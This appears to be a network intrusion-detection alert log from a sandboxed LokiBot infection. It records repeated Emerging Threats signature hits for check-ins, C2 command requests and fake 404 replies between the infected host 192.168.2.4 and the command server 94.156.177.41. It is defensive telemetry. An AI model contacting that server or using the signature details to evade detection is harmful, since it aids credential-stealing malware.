2025-01-07T12:32:17.621099+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49760	94.156.177.41	80	TCP
2025-01-07T12:32:17.621099+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49760	94.156.177.41	80	TCP
2025-01-07T12:32:18.365851+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49760	94.156.177.41	80	TCP
2025-01-07T12:32:18.365851+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49760	94.156.177.41	80	TCP
2025-01-07T12:32:18.370632+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49760	TCP
2025-01-07T12:32:18.524599+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49761	94.156.177.41	80	TCP
2025-01-07T12:32:18.524599+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49761	94.156.177.41	80	TCP
2025-01-07T12:32:18.524599+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49761	94.156.177.41	80	TCP
2025-01-07T12:32:19.255213+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49761	94.156.177.41	80	TCP
2025-01-07T12:32:19.255213+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49761	94.156.177.41	80	TCP
2025-01-07T12:32:19.260027+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49761	TCP
2025-01-07T12:32:19.413561+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49762	94.156.177.41	80	TCP
2025-01-07T12:32:19.413561+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49762	94.156.177.41	80	TCP
2025-01-07T12:32:19.413561+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49762	94.156.177.41	80	TCP
2025-01-07T12:32:20.161554+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49762	94.156.177.41	80	TCP
2025-01-07T12:32:20.161554+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49762	94.156.177.41	80	TCP
2025-01-07T12:32:20.166304+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49762	TCP
2025-01-07T12:32:20.319720+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49763	94.156.177.41	80	TCP
2025-01-07T12:32:20.319720+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49763	94.156.177.41	80	TCP
2025-01-07T12:32:20.319720+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49763	94.156.177.41	80	TCP
2025-01-07T12:32:21.055285+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49763	94.156.177.41	80	TCP
2025-01-07T12:32:21.055285+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49763	94.156.177.41	80	TCP
2025-01-07T12:32:21.060111+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49763	TCP
2025-01-07T12:32:21.208840+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49764	94.156.177.41	80	TCP
2025-01-07T12:32:21.208840+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49764	94.156.177.41	80	TCP
2025-01-07T12:32:21.208840+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49764	94.156.177.41	80	TCP
2025-01-07T12:32:21.994686+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49764	94.156.177.41	80	TCP
2025-01-07T12:32:21.994686+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49764	94.156.177.41	80	TCP
2025-01-07T12:32:21.999489+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49764	TCP
2025-01-07T12:32:22.190721+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49765	94.156.177.41	80	TCP
2025-01-07T12:32:22.190721+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49765	94.156.177.41	80	TCP
2025-01-07T12:32:22.190721+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49765	94.156.177.41	80	TCP
2025-01-07T12:32:22.907710+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49765	94.156.177.41	80	TCP
2025-01-07T12:32:22.907710+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49765	94.156.177.41	80	TCP
2025-01-07T12:32:22.924878+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49765	TCP
2025-01-07T12:32:23.083462+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49766	94.156.177.41	80	TCP
2025-01-07T12:32:23.083462+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49766	94.156.177.41	80	TCP
2025-01-07T12:32:23.083462+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49766	94.156.177.41	80	TCP
2025-01-07T12:32:23.819944+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49766	94.156.177.41	80	TCP
2025-01-07T12:32:23.819944+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49766	94.156.177.41	80	TCP
2025-01-07T12:32:23.824756+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49766	TCP
2025-01-07T12:32:23.973870+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49767	94.156.177.41	80	TCP
2025-01-07T12:32:23.973870+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49767	94.156.177.41	80	TCP
2025-01-07T12:32:23.973870+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49767	94.156.177.41	80	TCP
2025-01-07T12:32:24.698249+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49767	94.156.177.41	80	TCP
2025-01-07T12:32:24.698249+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49767	94.156.177.41	80	TCP
2025-01-07T12:32:24.703088+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49767	TCP
2025-01-07T12:32:24.880636+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49768	94.156.177.41	80	TCP
2025-01-07T12:32:24.880636+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49768	94.156.177.41	80	TCP
2025-01-07T12:32:24.880636+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49768	94.156.177.41	80	TCP
2025-01-07T12:32:25.606968+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49768	94.156.177.41	80	TCP
2025-01-07T12:32:25.606968+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49768	94.156.177.41	80	TCP
2025-01-07T12:32:25.629186+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49768	TCP
2025-01-07T12:32:25.829746+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49769	94.156.177.41	80	TCP
2025-01-07T12:32:25.829746+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49769	94.156.177.41	80	TCP
2025-01-07T12:32:25.829746+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49769	94.156.177.41	80	TCP
2025-01-07T12:32:26.577641+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49769	94.156.177.41	80	TCP
2025-01-07T12:32:26.577641+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49769	94.156.177.41	80	TCP
2025-01-07T12:32:26.582437+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49769	TCP
2025-01-07T12:32:26.723358+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49770	94.156.177.41	80	TCP
2025-01-07T12:32:26.723358+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49770	94.156.177.41	80	TCP
2025-01-07T12:32:26.723358+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49770	94.156.177.41	80	TCP
2025-01-07T12:32:27.430547+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49770	94.156.177.41	80	TCP
2025-01-07T12:32:27.430547+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49770	94.156.177.41	80	TCP
2025-01-07T12:32:27.435344+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49770	TCP
2025-01-07T12:32:27.582510+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49771	94.156.177.41	80	TCP
2025-01-07T12:32:27.582510+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49771	94.156.177.41	80	TCP
2025-01-07T12:32:27.582510+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49771	94.156.177.41	80	TCP
2025-01-07T12:32:28.316402+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49771	94.156.177.41	80	TCP
2025-01-07T12:32:28.316402+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49771	94.156.177.41	80	TCP
2025-01-07T12:32:28.347249+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49771	TCP
2025-01-07T12:32:28.619054+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49772	94.156.177.41	80	TCP
2025-01-07T12:32:28.619054+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49772	94.156.177.41	80	TCP
2025-01-07T12:32:28.619054+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49772	94.156.177.41	80	TCP
2025-01-07T12:32:29.349357+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49772	94.156.177.41	80	TCP
2025-01-07T12:32:29.349357+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49772	94.156.177.41	80	TCP
2025-01-07T12:32:29.354116+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49772	TCP
2025-01-07T12:32:29.504390+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49773	94.156.177.41	80	TCP
2025-01-07T12:32:29.504390+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49773	94.156.177.41	80	TCP
2025-01-07T12:32:29.504390+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49773	94.156.177.41	80	TCP
2025-01-07T12:32:30.221935+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49773	94.156.177.41	80	TCP
2025-01-07T12:32:30.221935+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49773	94.156.177.41	80	TCP
2025-01-07T12:32:30.226727+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49773	TCP
2025-01-07T12:32:30.382420+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49774	94.156.177.41	80	TCP
2025-01-07T12:32:30.382420+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49774	94.156.177.41	80	TCP
2025-01-07T12:32:30.382420+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49774	94.156.177.41	80	TCP
2025-01-07T12:32:31.091089+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49774	94.156.177.41	80	TCP
2025-01-07T12:32:31.091089+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49774	94.156.177.41	80	TCP
2025-01-07T12:32:31.100067+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49774	TCP
2025-01-07T12:32:31.256603+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49775	94.156.177.41	80	TCP
2025-01-07T12:32:31.256603+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49775	94.156.177.41	80	TCP
2025-01-07T12:32:31.256603+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49775	94.156.177.41	80	TCP
2025-01-07T12:32:31.988683+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49775	94.156.177.41	80	TCP
2025-01-07T12:32:31.988683+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49775	94.156.177.41	80	TCP
2025-01-07T12:32:31.994435+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49775	TCP
2025-01-07T12:32:32.155614+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49776	94.156.177.41	80	TCP
2025-01-07T12:32:32.155614+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49776	94.156.177.41	80	TCP
2025-01-07T12:32:32.155614+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49776	94.156.177.41	80	TCP
2025-01-07T12:32:32.891493+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49776	94.156.177.41	80	TCP
2025-01-07T12:32:32.891493+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49776	94.156.177.41	80	TCP
2025-01-07T12:32:32.896298+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49776	TCP
2025-01-07T12:32:33.032901+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49777	94.156.177.41	80	TCP
2025-01-07T12:32:33.032901+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49777	94.156.177.41	80	TCP
2025-01-07T12:32:33.032901+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49777	94.156.177.41	80	TCP
2025-01-07T12:32:33.772124+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49777	94.156.177.41	80	TCP
2025-01-07T12:32:33.772124+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49777	94.156.177.41	80	TCP
2025-01-07T12:32:33.776885+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49777	TCP
2025-01-07T12:32:33.924411+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49778	94.156.177.41	80	TCP
2025-01-07T12:32:33.924411+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49778	94.156.177.41	80	TCP
2025-01-07T12:32:33.924411+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49778	94.156.177.41	80	TCP
2025-01-07T12:32:34.665544+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49778	94.156.177.41	80	TCP
2025-01-07T12:32:34.665544+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49778	94.156.177.41	80	TCP
2025-01-07T12:32:34.670302+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49778	TCP
2025-01-07T12:32:34.814297+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49779	94.156.177.41	80	TCP
2025-01-07T12:32:34.814297+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49779	94.156.177.41	80	TCP
2025-01-07T12:32:34.814297+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49779	94.156.177.41	80	TCP
2025-01-07T12:32:35.557501+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49779	94.156.177.41	80	TCP
2025-01-07T12:32:35.557501+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49779	94.156.177.41	80	TCP
2025-01-07T12:32:35.562339+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49779	TCP
2025-01-07T12:32:35.704114+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49780	94.156.177.41	80	TCP
2025-01-07T12:32:35.704114+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49780	94.156.177.41	80	TCP
2025-01-07T12:32:35.704114+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49780	94.156.177.41	80	TCP
2025-01-07T12:32:36.434903+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49780	94.156.177.41	80	TCP
2025-01-07T12:32:36.434903+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49780	94.156.177.41	80	TCP
2025-01-07T12:32:36.439728+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49780	TCP
2025-01-07T12:32:36.588546+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49781	94.156.177.41	80	TCP
2025-01-07T12:32:36.588546+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49781	94.156.177.41	80	TCP
2025-01-07T12:32:36.588546+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49781	94.156.177.41	80	TCP
2025-01-07T12:32:37.324672+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49781	94.156.177.41	80	TCP
2025-01-07T12:32:37.324672+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49781	94.156.177.41	80	TCP
2025-01-07T12:32:37.329468+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49781	TCP
2025-01-07T12:32:37.473584+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49782	94.156.177.41	80	TCP
2025-01-07T12:32:37.473584+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49782	94.156.177.41	80	TCP
2025-01-07T12:32:37.473584+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49782	94.156.177.41	80	TCP
2025-01-07T12:32:38.192729+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49782	94.156.177.41	80	TCP
2025-01-07T12:32:38.192729+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49782	94.156.177.41	80	TCP
2025-01-07T12:32:38.197506+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49782	TCP
2025-01-07T12:32:38.360546+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49783	94.156.177.41	80	TCP
2025-01-07T12:32:38.360546+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49783	94.156.177.41	80	TCP
2025-01-07T12:32:38.360546+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49783	94.156.177.41	80	TCP
2025-01-07T12:32:39.104383+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49783	94.156.177.41	80	TCP
2025-01-07T12:32:39.104383+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49783	94.156.177.41	80	TCP
2025-01-07T12:32:39.109271+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49783	TCP
2025-01-07T12:32:39.253004+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49784	94.156.177.41	80	TCP
2025-01-07T12:32:39.253004+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49784	94.156.177.41	80	TCP
2025-01-07T12:32:39.253004+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49784	94.156.177.41	80	TCP
2025-01-07T12:32:39.957327+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49784	94.156.177.41	80	TCP
2025-01-07T12:32:39.957327+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49784	94.156.177.41	80	TCP
2025-01-07T12:32:39.962119+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49784	TCP
2025-01-07T12:32:40.116039+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49785	94.156.177.41	80	TCP
2025-01-07T12:32:40.116039+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49785	94.156.177.41	80	TCP
2025-01-07T12:32:40.116039+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49785	94.156.177.41	80	TCP
2025-01-07T12:32:40.840674+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49785	94.156.177.41	80	TCP
2025-01-07T12:32:40.840674+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49785	94.156.177.41	80	TCP
2025-01-07T12:32:40.845506+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49785	TCP
2025-01-07T12:32:40.987508+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49786	94.156.177.41	80	TCP
2025-01-07T12:32:40.987508+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49786	94.156.177.41	80	TCP
2025-01-07T12:32:40.987508+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49786	94.156.177.41	80	TCP
2025-01-07T12:32:41.705575+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49786	94.156.177.41	80	TCP
2025-01-07T12:32:41.705575+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49786	94.156.177.41	80	TCP
2025-01-07T12:32:41.710383+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49786	TCP
2025-01-07T12:32:41.861754+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49787	94.156.177.41	80	TCP
2025-01-07T12:32:41.861754+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49787	94.156.177.41	80	TCP
2025-01-07T12:32:41.861754+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49787	94.156.177.41	80	TCP
2025-01-07T12:32:42.591000+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49787	94.156.177.41	80	TCP
2025-01-07T12:32:42.591000+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49787	94.156.177.41	80	TCP
2025-01-07T12:32:42.595767+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49787	TCP
2025-01-07T12:32:42.736881+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49788	94.156.177.41	80	TCP
2025-01-07T12:32:42.736881+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49788	94.156.177.41	80	TCP
2025-01-07T12:32:42.736881+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49788	94.156.177.41	80	TCP
2025-01-07T12:32:43.480919+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49788	94.156.177.41	80	TCP
2025-01-07T12:32:43.480919+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49788	94.156.177.41	80	TCP
2025-01-07T12:32:43.485712+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49788	TCP
2025-01-07T12:32:43.630025+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49789	94.156.177.41	80	TCP
2025-01-07T12:32:43.630025+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49789	94.156.177.41	80	TCP
2025-01-07T12:32:43.630025+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49789	94.156.177.41	80	TCP
2025-01-07T12:32:44.368376+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49789	94.156.177.41	80	TCP
2025-01-07T12:32:44.368376+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49789	94.156.177.41	80	TCP
2025-01-07T12:32:44.373199+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49789	TCP
2025-01-07T12:32:44.529692+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49790	94.156.177.41	80	TCP
2025-01-07T12:32:44.529692+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49790	94.156.177.41	80	TCP
2025-01-07T12:32:44.529692+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49790	94.156.177.41	80	TCP
2025-01-07T12:32:45.260532+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49790	94.156.177.41	80	TCP
2025-01-07T12:32:45.260532+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49790	94.156.177.41	80	TCP
2025-01-07T12:32:45.265357+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49790	TCP
2025-01-07T12:32:45.411818+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49791	94.156.177.41	80	TCP
2025-01-07T12:32:45.411818+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49791	94.156.177.41	80	TCP
2025-01-07T12:32:45.411818+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49791	94.156.177.41	80	TCP
2025-01-07T12:32:46.120173+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49791	94.156.177.41	80	TCP
2025-01-07T12:32:46.120173+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49791	94.156.177.41	80	TCP
2025-01-07T12:32:46.125040+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49791	TCP
2025-01-07T12:32:46.293457+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49792	94.156.177.41	80	TCP
2025-01-07T12:32:46.293457+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49792	94.156.177.41	80	TCP
2025-01-07T12:32:46.293457+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49792	94.156.177.41	80	TCP
2025-01-07T12:32:47.026386+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49792	94.156.177.41	80	TCP
2025-01-07T12:32:47.026386+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49792	94.156.177.41	80	TCP
2025-01-07T12:32:47.031149+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49792	TCP
2025-01-07T12:32:47.179130+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49793	94.156.177.41	80	TCP
2025-01-07T12:32:47.179130+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49793	94.156.177.41	80	TCP
2025-01-07T12:32:47.179130+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49793	94.156.177.41	80	TCP
2025-01-07T12:32:47.914990+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49793	94.156.177.41	80	TCP
2025-01-07T12:32:47.914990+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49793	94.156.177.41	80	TCP
2025-01-07T12:32:47.919801+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49793	TCP
